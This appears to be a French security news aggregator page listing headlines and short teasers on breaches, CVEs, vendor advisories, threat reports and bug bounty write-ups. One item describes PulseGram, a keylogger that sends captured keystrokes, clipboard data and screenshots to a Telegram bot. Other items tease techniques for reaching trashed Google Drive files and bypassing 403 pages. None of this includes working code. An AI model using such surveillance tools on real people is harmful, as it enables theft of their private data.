L'Actu de la presse spécialisée
Cybersecurity in Mergers and Acquisitions – CISO Focus
Cybersecurity in mergers and acquisitions is crucial, as M&A activities represent key inflection points for organizations, offering growth opportunities while introducing significant security challenges. In today’s threat landscape, cybersecurity has become a decisive factor in M&A success, with studies showing that over 40% of deals face serious cybersecurity issues post-acquisition. The valuation impact can be […]
The post Cybersecurity in Mergers and Acquisitions – CISO Focus appeared first on Cyber Security News.
https://cybersecuritynews.com/cybersecurity-in-mergers-and-acquisitions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Top Cybersecurity Trends Every CISO Must Watch in 2025
In 2025, cybersecurity trends for CISOs will reflect a landscape that is more dynamic and challenging than ever before. The rapid pace of technological change, the proliferation of connected devices, and the growing sophistication of cyber threats are pushing organizations to rethink their security strategies. For Chief Information Security Officers (CISOs), staying ahead of these […]
The post Top Cybersecurity Trends Every CISO Must Watch in 2025 appeared first on Cyber Security News.
https://cybersecuritynews.com/cybersecurity-trends-for-cisos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Zero Trust Architecture – A CISO's Blueprint for Modern Security
Zero-trust architecture has become essential for securing operations in today's hyper-connected world, where corporate network boundaries have vanished and employees, cloud services, and data span multiple environments. This new reality has rendered traditional perimeter-based security models ineffective, exposing organizations to sophisticated cyber threats from both outside and within. As the guardians of enterprise security, Chief […]
The post Zero Trust Architecture – A CISO's Blueprint for Modern Security appeared first on Cyber Security News.
https://cybersecuritynews.com/zero-trust-architecture-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chrome 136 Released With Patch For 20-Year-Old Privacy Vulnerability
The Chrome team has officially promoted Chrome 136 to the stable channel for Windows, Mac, and Linux, marking a significant update for users across platforms. The rollout, which will occur over the coming days and weeks, brings a host of fixes and improvements, with a particular focus on security and privacy enhancements. One of the […]
The post Chrome 136 Released With Patch For 20-Year-Old Privacy Vulnerability appeared first on Cyber Security News.
https://cybersecuritynews.com/chrome-136-released/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. CISA adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SAP NetWeaver flaw, tracked as CVE-2025-31324, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, researchers warned that a zero-day vulnerability, tracked as CVE-2025-31324 (CVSS score of 10/10), in SAP NetWeaver is […]
https://securityaffairs.com/177218/hacking/u-s-cisa-adds-sap-netweaver-flaw-to-its-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la presse
Cyber attack on firm with ransom demand - Hindustan Times
Cyber attack on firm with ransom demand · The incident was reported at MJ Biopharm Pvt Ltd Company located in Phase 2 of Hinjewadi Rajiv Gandhi ...
https://www.hindustantimes.com/cities/pune-news/cyber-attack-on-firm-with-ransom-demand-101745952867968.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Soutenez No Hack Me sur Tipeee
L'Actu de la veille (Presse spécialisée)
How to Access the World's Top AI Tools with AIChief in One Platform
AIChief is the top AI tools directory offering expert reviews, side-by-side comparisons, news updates, and promotional services for tool owners. It saves users hours of research, ensuring trusted insights and exposure for AI startups, developers, students, and professionals navigating the evolving AI landscape.
https://hackernoon.com/how-to-access-the-worlds-top-ai-tools-with-aichief-in-one-platform?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Slackware 15.0: 2025-119-02 critical: mozilla-thunderbird security fix
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.
https://linuxsecurity.com/advisories/slackware/slackware-2025-119-02-mozilla-thunderbird-5znjcoimfb17
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Slackware 15.0: 2025-119-01 critical: mozilla-firefox security improvements
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.
https://linuxsecurity.com/advisories/slackware/slackware-2025-119-01-mozilla-firefox-fcp8irht3drv
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why Generative AI and That Human Touch Can Transform Your Online HR Software Strategy
The integration of generative AI into your HR software can rapidly transform how you carry out traditional HR practices, introducing new time-saving features and streamlining processes.
https://hackernoon.com/why-generative-ai-and-that-human-touch-can-transform-your-online-hr-software-strategy?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Selvaraja Elumalai's Digital Evolution at a Leading Pharmaceutical Company
Selvaraja Elumalai revolutionized a pharma company's QC labs with a digital transformation that reduced errors, cut documentation time by 40%, and improved regulatory speed. His integrated system approach set new industry benchmarks for compliance, efficiency, and data integrity in highly regulated environments.
https://hackernoon.com/selvaraja-elumalais-digital-evolution-at-a-leading-pharmaceutical-company?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
It Worked for a While - So, Why Did Everything Break?
Success isn't the end, it's the beginning of new risks. In product management, second-order thinking is critical to anticipate what breaks after a "win." From unexpected pricing disasters to broken standup rituals, this piece shares real-world lessons and a practical "Ripple Radar" blueprint to help PMs and PM leaders future-proof their launches before they unravel.
https://hackernoon.com/it-worked-for-a-while-so-why-did-everything-break?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fedora 42 Update: digikam addresses Libraw security issues
update internal Libraw to 2025/03/17 snapshot
https://linuxsecurity.com/advisories/fedora/fedora-42-digikam-2025-1c1e378468-dszznz1ufqyf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fedora 42: 2025-17f64d2c4d moderate: IceCat JavaScript Fix
Rebuild with pregenerated cbindgen
https://linuxsecurity.com/advisories/fedora/fedora-42-icecat-2025-17f64d2c4d-eovnzovtwerx
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Transforming Business Through SAP Innovation by Nagender Yadav
Nagender Yadav, a Deloitte leader and SAP expert, developed industry-defining solutions like DCHiPS, cutting SAP costs by up to 50% and timelines by 40%. His pricing designs improved healthcare access, and his AI- and analytics-driven methods modernize SAP implementations globally. A pioneer in enterprise systems, he's shaping SAP's future.
https://hackernoon.com/transforming-business-through-sap-innovation-by-nagender-yadav?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fedora 42 - FEDORA-2025-caed275f11 critical: LibRaw Out-of-Buffer Access
Update to LibRaw 0.21.4.
https://linuxsecurity.com/advisories/fedora/fedora-42-mingw-libraw-2025-caed275f11-i3zpqrn7mrug
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Escape the AIpocalypse: Essential Strategies for Developers
The AIpocolypse is here, and it means a lot of change for developers. I explore how we can approach the transition with poise and leverage our skills to be successful in this next era, not destroyed by it.
https://hackernoon.com/escape-the-aipocalypse-essential-strategies-for-developers?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Transforming Urban Mobility: Excellence in Transportation Systems Management by Sathish Rao
Sathish Rao optimized Florida's SR-7 corridor, boosting traffic flow, reducing delays, and cutting emissions. His leadership during high-profile events and real-time incidents showcased expert traffic systems management, setting a new standard for urban mobility and sustainability.
https://hackernoon.com/transforming-urban-mobility-excellence-in-transportation-systems-management-by-sathish-rao?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Architecting Speed and Reliability: Inside the FNB Bank Trading Platform Success
SanghaMithra Duggirala led the rapid deployment of FNB Bank's equities and bonds trading platform, achieving full production in just four months. Through innovative architecture and cross-team leadership, she set new standards for speed, system reliability, and enterprise fintech integration.
https://hackernoon.com/architecting-speed-and-reliability-inside-the-fnb-bank-trading-platform-success?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SUSE: 2025:1402-1 important: Linux Kernel Security Threats Fixed
* bsc#1235431 * bsc#1240840 Cross-References: * CVE-2024-56650
https://linuxsecurity.com/advisories/suse/suse-2025-1402-1-important-the-linux-kernel-hffpengqclad
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing the Future: Varun Grover's Blueprint for Safe and Scalable Generative AI
Varun Grover champions secure Generative AI adoption through AISPM, thought leadership, and enterprise strategy. His work helps organizations mitigate AI threats, ensure compliance, and scale responsibly—positioning him as a key voice in the future of AI security.
https://hackernoon.com/securing-the-future-varun-grovers-blueprint-for-safe-and-scalable-generative-ai?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Grinex exchange suspected rebrand of sanctioned Garantex crypto firm
A new cryptocurrency exchange named Grinex is believed to be a rebrand of Garantex, a Russian cryptocurrency exchange whose domains were seized by the U.S. authorities and an admin arrested. [...]
https://www.bleepingcomputer.com/news/cryptocurrency/grinex-exchange-suspected-rebrand-of-sanctioned-garantex-crypto-firm/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Are AI Deities the Future for Worshipers?
The Tianhou Temple in Johor, Malaysia, has unveiled the world's first [AI-powered Mazu statue. The statue is a digital representation of the revered Chinese sea goddess. It allows devotees to interact with a digital deity displayed on a screen.
https://hackernoon.com/are-ai-deities-the-future-for-worshipers?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mantra Crash Fallout: Is Investor Confidence in Tokenized RWAs at Risk?
The OM token powering Mantra's RWA blockchain collapsed 90% in hours, triggering B in losses and exposing deep cracks in trust, liquidity, and transparency.
https://hackernoon.com/mantra-crash-fallout-is-investor-confidence-in-tokenized-rwas-at-risk?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Powering Bolivia: Glory Shrivastava's Engineering Feat in Industrial Automation
Controls Engineer Glory Shrivastava led a high-stakes automation upgrade for Bolivia's national gas supply. Managing design to commissioning, she delivered complex PLC, BMS, and HMI systems on time, setting new safety and efficiency benchmarks in industrial automation under intense pressure.
https://hackernoon.com/powering-bolivia-glory-shrivastavas-engineering-feat-in-industrial-automation?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft: Windows Server hotpatching to require subscription
Microsoft has announced it will require paid subscriptions for Windows Server 2025 hotpatching, a service that enables admins to install security updates without restarting. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-server-hotpatching-to-require-subscription/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Many Fuel Tank Monitoring Systems Vulnerable to Disruption
Thousands of automatic tank gauge (ATG) devices are accessible over the Internet and are just "a packet away" from compromise, security researcher warns at 2025 RSAC Conference.
https://www.darkreading.com/ics-ot-security/fuel-tank-monitoring-systems-vulnerable-disruption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers ramp up scans for leaked Git tokens and secrets
Threat actors are intensifying internet-wide scanning for Git configuration files that can reveal sensitive secrets and authentication tokens used to compromise cloud services and source code repositories. [...]
https://www.bleepingcomputer.com/news/security/hackers-ramp-up-scans-for-leaked-git-tokens-and-secrets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
France ties Russian APT28 hackers to 12 cyberattacks on French orgs
Today, the French foreign ministry blamed the APT28 hacking group linked to Russia's military intelligence service (GRU) for targeting or breaching a dozen French entities over the last four years. [...]
https://www.bleepingcomputer.com/news/security/france-ties-russian-apt28-hackers-to-12-cyberattacks-on-french-orgs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
10 Best Cybersecurity Names At RSA Conference 2025
Marketing lesson from CISOs – Steve Morgan, Editor-in-Chief Sausalito, Calif. – Apr. 29, 2025 Who has the best cybersecurity name at the RSA Conference in San Francisco this year? It depends on who you ask. The editors at Cybercrime Magazine took a swing at it.
The post 10 Best Cybersecurity Names At RSA Conference 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/10-best-cybersecurity-names-at-rsa-conference-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SentinelOne warns of threat actors targeting its systems and high-value clients
SentinelOne warns China-linked APT group PurpleHaze attempted reconnaissance on its systems and high-value clients. Cybersecurity firm SentinelOne warns that a China-linked APT group, tracked as PurpleHaze, attempted to conduct reconnaissance on its infrastructure and high-value clients. The activity suggests targeted cyberespionage efforts aimed at gathering information for potential future attacks. SentinelOne first identified PurpleHaze’s activity […]
https://securityaffairs.com/177205/security/sentinelone-warns-threat-actors-targeting-its-systems-and-high-value-clients.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Build a Private Linux Workstation
Let's be real''online privacy isn't optional anymore. Attacks are up, tracking is baked into everything, and if you're not locking things down, you're exposed. If you care about your data, it's on you to take the reins and actually secure it.
https://linuxsecurity.com/news/privacy/linux-privacy-workstation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Mission-Centric to People-Centric: Competitive Leadership in Cyber
Making a case for empathy in cyber-leadership roles as a strategic business advantage.
https://www.darkreading.com/remote-workforce/mission-people-competitive-leadership-cyber
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hacking in Space: Not as Tough as You Might Think
Barbara Grofe, space asset security architect at Spartan Corp, discussed the realities of hacking in space, and the outlook is not pie-in-the-sky.
https://www.darkreading.com/cloud-security/hacking-space-not-tough
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scattered Spider Suspected in Major M&S Cyberattack
The cyberattack on Marks & Spencer (M&S) is linked to the notorious Scattered Spider group. Explore the severe…
https://hackread.com/scattered-spider-suspected-in-major-ms-cyberattack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Apple 'AirBorne' flaws can lead to zero-click AirPlay RCE attacks
A set of security vulnerabilities in Apple's AirPlay Protocol and AirPlay Software Development Kit (SDK) exposed unpatched third-party and Apple devices to various attacks, including remote code execution. [...]
https://www.bleepingcomputer.com/news/security/apple-airborne-flaws-can-lead-to-zero-click-airplay-rce-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SK Telecom cyberattack: Free SIM replacements for 25 million customers
South Korean mobile provider SK Telecom has announced free SIM card replacements to its 25 million mobile customers following a recent USIM data breach, but only 6 million cards are available through May. [...]
https://www.bleepingcomputer.com/news/security/sk-telecom-cyberattack-free-sim-replacements-for-25-million-customers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7423-2: GNU binutils vulnerabilities
USN-7423-1 fixed several vulnerabilities in GNU. This update provides
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.
Original advisory details:
It was discovered that GNU binutils incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a crash or execute
arbitrary code. (CVE-2025-0840)
It was discovered that GNU binutils incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a crash, expose
sensitive information or execute arbitrary code.
(CVE-2025-1153)
It was discovered that ld in GNU binutils incorrectly handled certain
files. An attacker could possibly use this issue to execute arbitrary
code. (CVE-2025-1176)
https://ubuntu.com/security/notices/USN-7423-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SecAI Debuts at RSA 2025, Redefining Threat Investigation with AI
San Francisco, United States, 29th April 2025, CyberNewsWire
https://hackread.com/secai-debuts-at-rsa-2025-redefining-threat-investigation-with-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cutting through the noise: How to prioritize Dependabot alerts
Learn how to effectively prioritize alerts using severity (CVSS), exploitation likelihood (EPSS), and repository properties, so you can focus on the most critical vulnerabilities first.
The post Cutting through the noise: How to prioritize Dependabot alerts appeared first on The GitHub Blog.
https://github.blog/security/application-security/cutting-through-the-noise-how-to-prioritize-dependabot-alerts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft fixes Outlook paste, blank calendar rendering issues
Microsoft has confirmed several issues affecting Microsoft 365 customers using the "paste special' option and the calendar feature in the classic Outlook email client. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-paste-blank-calendar-rendering-issues/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US Critical Infrastructure Still Struggles With OT Security
How does a company defend itself from cyberattacks by a foreign adversary? A collection of experts gathered at this year's RSAC Conference to explain how the US can help.
https://www.darkreading.com/remote-workforce/critical-infrastructure-struggles-ot-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Healthcare Providers Investigate And Prevent Cyber Attacks: Real-world Examples
According to IBM Security annual research, “Cost of a Data Breach Report 2024”, an average cost of a data breach in healthcare in 2024 was .77 million, the highest among all industries due to sensitive patient data and regulatory penalties. A Reality Check: Healthcare Cybercrime Scale Just some more statistics from recent research: Prevention Is […]
The post How Healthcare Providers Investigate And Prevent Cyber Attacks: Real-world Examples appeared first on Cyber Security News.
https://cybersecuritynews.com/how-healthcare-providers-investigate-and-prevent-cyber-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NVIDIA Riva Vulnerabilities Exposes Enable Authorized Access to Cloud Environments
A critical security flaw in NVIDIA’s Riva framework, an AI-powered speech and translation service, has left cloud environments vulnerable to unauthorized access and exploitation. Trend Micro researchers uncovered two vulnerabilities-CVE-2025-23242 and CVE-2025-23243-stemming from misconfigured deployments that expose Riva's gRPC and Triton Inference Server endpoints to the public internet. These flaws enable threat actors to bypass […]
The post NVIDIA Riva Vulnerabilities Exposes Enable Authorized Access to Cloud Environments appeared first on Cyber Security News.
https://cybersecuritynews.com/nvidia-riva-vulnerabilities-exposes-enable-authorized-access/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
6 Best CMMC Consulting Services for Small Businesses
The best CMMC consulting service for small businesses can help you stay competitive and compliant in the defense space. CMMC — or Cybersecurity Maturity Model Certification — is a security framework developed by the U.S. Department of Defense (DoD) to safeguard sensitive information across its supply chain. If you work with the DoD, you must […]
The post 6 Best CMMC Consulting Services for Small Businesses appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/29/6-best-cmmc-consulting-services-for-small-businesses/?utm_source=rss&utm_medium=rss&utm_campaign=6-best-cmmc-consulting-services-for-small-businesses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CISA Adds Broadcom Brocade Fabric OS Vulnerability to Known Exploited Vulnerabilities Catalog
CISA officially added a significant security flaw affecting Broadcom's Brocade Fabric OS to its authoritative Known Exploited Vulnerabilities (KEV) Catalog, underscoring the urgent need for remediation across enterprise and government environments. The vulnerability, tracked as CVE-2025-1976, is classified as a code injection vulnerability and carries a high CVSS base score of 8.6 due to its […]
The post CISA Adds Broadcom Brocade Fabric OS Vulnerability to Known Exploited Vulnerabilities Catalog appeared first on Cyber Security News.
https://cybersecuritynews.com/broadcom-brocade-fabric-os-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CISA tags Broadcom Fabric OS, CommVault flaws as exploited in attacks
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning of Broadcom Brocade Fabric OS, Commvault web servers, and Qualitia Active! Mail clients vulnerabilities that are actively exploited in attacks. [...]
https://www.bleepingcomputer.com/news/security/cisa-tags-broadcom-fabric-os-commvault-flaws-as-exploited-in-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AirPlay Zero-Click RCE Vulnerability Enables Remote Device Takeover via Wi-Fi
A critical vulnerability in Apple's AirPlay protocol, dubbed AirBorne, has exposed over 2.35 billion active Apple devices and tens of millions of third-party gadgets to remote code execution (RCE) attacks requiring no user interaction. Researchers at Oligo Security discovered that the flaw allows attackers on the same Wi-Fi network to hijack devices ranging from Macs […]
The post AirPlay Zero-Click RCE Vulnerability Enables Remote Device Takeover via Wi-Fi appeared first on Cyber Security News.
https://cybersecuritynews.com/airplay-zero-click-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Expands Trillion Total Addressable Market For Cybersecurity Providers
This week in cybersecurity from the editors at Cybercrime Magazine –Read the press release from EIN Presswire Sausalito, Calif. – Apr. 29, 2025 AI is expanding a trillion total addressable market (TAM) for cybersecurity providers, according to a 2024/2025 study by McKinsey, a global
The post AI Expands Trillion Total Addressable Market For Cybersecurity Providers appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ai-expands-2-trillion-total-addressable-market-for-cybersecurity-providers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Risks of Using AI Models Developed by Competing Nations
The current offline/open source model boom is unstoppable. Its impact depends on how well the risks are managed today.
https://www.darkreading.com/vulnerabilities-threats/risks-using-ai-models-developed-competing-nations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Digital rampage saw ex-Disney employee remove nut allergy info from menus, dox co-workers, and more
A former Disney employee has been sentenced to three years in prison for computer fraud and identity theft.
https://www.malwarebytes.com/blog/news/2025/04/digital-rampage-saw-ex-disney-employee-remove-nut-allergy-info-from-menus-dox-co-workers-and-more
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Backdoor Targets Members of Exiled Uyghur Community
A spear-phishing campaign sent Trojanized versions of legitimate word-processing software to members of the World Uyghur Congress as part of China's continued cyber-espionage activity against the ethnic minority.
https://www.darkreading.com/cyberattacks-data-breaches/windows-backdoor-targets-members-exhiled-uyghur-community
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Chrome Vulnerability Let Attackers Escape Payload from Sandbox – Technical Details Disclosed
A critical vulnerability in Google Chrome has recently been discovered that allows malicious actors to break out of the browser’s protective sandbox environment, potentially giving attackers access to the underlying operating system. The flaw, identified as CVE-2025-2783, affects Chrome versions prior to 134.0.6998.142 across Windows, macOS, and Linux platforms. This vulnerability represents a significant security […]
The post Google Chrome Vulnerability Let Attackers Escape Payload from Sandbox – Technical Details Disclosed appeared first on Cyber Security News.
https://cybersecuritynews.com/google-chrome-vulnerability-let-attackers-escape-payload-from-sandbox/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7469-3: Node.js vulnerability
USN-7469-1 fixed a vulnerability in Apache Traffic Server. This update
provides the corresponding updates for Node.js.
Original advisory details:
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Rocky Linux Achieves FIPS 140-3 Compliance
Rocky Linux has taken a major leap forward by achieving FIPS 140-3 compliance for versions 8 and 9.2. This achievement makes the already popular distro an even more attractive option for admins managing environments that require stringent encryption and cryptographic standards, such as in government agencies and regulated industries.
https://linuxsecurity.com/news/vendors-products/rocky-linux-fips-140-3-compliance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reinforcing resilience with financial assurance: Breach protection matters now more than ever
Introducing Rapid7's value-added Breach Protection Warranty that delivers confidence, clarity, and coverage when it matters most.
https://blog.rapid7.com/2025/04/29/reinforcing-resilience-with-financial-assurance-breach-protection-matters-now-more-than-ever/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
InsightIDR AI Alert Triage Automatically Classifies Alerts with 99.93% Accuracy
Rapid7's AI Alert Triage – trained and tested by the Rapid7 global MDR service across trillions of alerts worldwide — will soon be available to users of our next-gen SIEM, InsightIDR, at no additional cost.
https://blog.rapid7.com/2025/04/29/insightidr-ai-alert-triage-automatically-classifies-alerts-with-99-93-accuracy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deepening the MDR partnership: Rapid7 now delivers Active Remediation with Velociraptor
Powered by our best-in-class, open-source digital forensics and incident response (DFIR) tool, Rapid7 MDR analysts can take direct, approved remediation actions on your behalf.
https://blog.rapid7.com/2025/04/29/deepening-the-mdr-partnership-rapid7-now-delivers-active-remediation-with-velociraptor/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pulsegram - Integrated Keylogger With Telegram
PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts. ⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited. _____ _ _____ | __ \ | | / ____| | |__) | _| |___ ___| | __ _ __ __ _ _ __ ___ | ___/ | | | / __|/ _ \ | |_ | '__/ _` | '_ ` _ \ | | | |_| | \__ \ __/ |__| | | | (_| | | | | | | |_| \__,_|_|___/\___|\_____|_| \__,_|_| |_| |_| Author:...
http://www.kitploit.com/2025/04/pulsegram-integrated-keylogger-with.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Driving down MTTR with Remediation Hub, Available in Rapid7 Exposure Command
Rapid7's Remediation Hub enables security teams to go beyond simply identifying vulnerabilities and focus more on remediating risk.
https://blog.rapid7.com/2025/04/29/driving-down-mttr-with-remediation-hub-available-in-rapid7-exposure-command/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Exposure to Assurance: Unified Remediation Across the Security Lifecycle
Rapid7's Exposure Command directly addresses this gap, combining advanced risk-based vulnerability management (RBVM) with environmental context, threat intelligence, and native workflow automation.
https://blog.rapid7.com/2025/04/29/from-exposure-to-assurance-unified-remediation-across-the-security-lifecycle/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Threat Intelligence Group (GTIG) tracked 75 actively exploited zero-day flaws in 2024
Google tracked 75 zero-day flaws exploited in 2024, down from 98 in 2023, according to its Threat Intelligence Group’s latest analysis. In 2024, Google tracked 75 exploited zero-day vulnerabilities, down from 98 in 2023 but up from 63 in 2022. The researchers from Google Threat Intelligence Group (GTIG) observed that most targeted are end-user platforms, […]
https://securityaffairs.com/177180/hacking/google-threat-intelligence-group-gtig-tracked-75-actively-exploited-zero-day-flaws-in-2024.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What privacy? Perplexity wants your data, builds browser to track you and serve ads
AI search service Perplexity AI doesn't just want you using its app—it wants to take over your web browsing experience too.
https://www.malwarebytes.com/blog/uncategorized/2025/04/what-privacy-perplexity-wants-your-data-builds-browser-to-track-you-and-serve-ads
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VeriSource data breach impacted 4M individuals
VeriSource breach exposed data of 4M people in Feb 2024; stolen info includes personal details from an employee benefits services provider. VeriSource is alerting 4 million people after a February 2024 breach that exposed personal information. The data was stolen on February 27, 2024, and the incident was discovered on February 28, 2024. The company […]
https://securityaffairs.com/177172/data-breach/verisource-services-inc-data-breach.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Outlaw cybergang attacking targets worldwide
The Kaspersky Global Emergency Response Team (GERT) detected an Outlaw mining botnet in a customer incident. In this article, we share insights into this botnet's SSH-based infection chain.
https://securelist.com/outlaw-botnet/116444/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Gremlin Stealer: New Stealer on Sale in Underground Forum
Advertised on Telegram, Gremlin Stealer is new malware active since March 2025 written in C#. Data stolen is uploaded to a server for publication.
The post Gremlin Stealer: New Stealer on Sale in Underground Forum appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-malware-gremlin-stealer-for-sale-on-telegram/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google: 97 zero-days exploited in 2024, over 50% in spyware attacks
Google's Threat Intelligence Group (GTIG) says attackers exploited 75 zero-day vulnerabilities in the wild last year, over 50% of which were linked to spyware attacks. [...]
https://www.bleepingcomputer.com/news/security/google-97-zero-days-exploited-in-2024-over-50-percent-in-spyware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Exploitation Is Shifting in 2024-25
The number of vulnerabilities exploited by attacks may not be growing these days, but they are increasingly affecting enterprise technologies.
https://www.darkreading.com/vulnerabilities-threats/vulnerability-exploitation-shifting-2024-25
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloudflare Tunnel Misconfigurations: A Silent Threat in DevOps Pipelines
An inside look at how misconfigured Cloudflare Tunnels in DevOps environments silently open doors for cyber attackers.In the modern DevOps ecosystem, where rapid deployment and secure remote access are crucial, Cloudflare Tunnel (formerly known as Argo Tunnel) has become a favorite. It allows developers to expose internal services to the internet securely — without needing to open inbound ports or manage complex firewall rules.However, what most teams fail to realize is this: Cloudflare Tunnel misconfigurations can unintentionally introduce critical vulnerabilities into CI/CD pipelines and production environments.Let's dive into how, why, and what can be done about it.🌐 What Is Cloudflare Tunnel?At its core, Cloudflare Tunnel establishes an outbound-only connection from your internal...
https://infosecwriteups.com/cloudflare-tunnel-misconfigurations-a-silent-threat-in-devops-pipelines-c1842ca56fdd?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How i Access The Deleted Files of Someone in Google Drive | Bug Bounty
The Illusion of Deletion: How Trashed Files in Google Drive Can Still Be Accessed — Understanding Google Drive's Trashed File AccessibilityHi Guys,introduction:So today, we will be discussing an interesting discovery about Google Drive's trash functionality — something that might surprise you. If you've ever assumed that moving a file to the trash means it's completely inaccessible, think again!What if I told you that your supposedly “deleted” file could still be downloaded with just one simple trick? It all started when I stumbled upon an interesting behavior in Google Drive — something that didn't quite make sense. I had a file, shared publicly with “Anyone with the link” as a viewer, and I decided to delete it by moving it to the trash. Naturally, I...
https://infosecwriteups.com/how-i-access-the-deleted-files-of-someone-in-google-drive-bug-bounty-eac134df1de4?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automating Information Gathering for Ethical Hackers — AutoRecon Tutorial
Here’s how Autorecon automates the recon phase and gives you faster, cleaner results in your penetration tests.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/automating-information-gathering-for-ethical-hackers-autorecon-tutorial-cd0448dad93f?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
0 Bounty: Full Path Disclosure on ads.twitter.com
Twitter Ads Bug Bounty: 0 for Discovering a Sensitive Information LeakContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/140-bounty-full-path-disclosure-on-ads-twitter-com-bdedd140ac27?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Hackers Try to Bypass 403 Forbidden Pages
How Hackers Try to Bypass 403 Forbidden Pages 🔥Continue reading on InfoSec Write-ups »
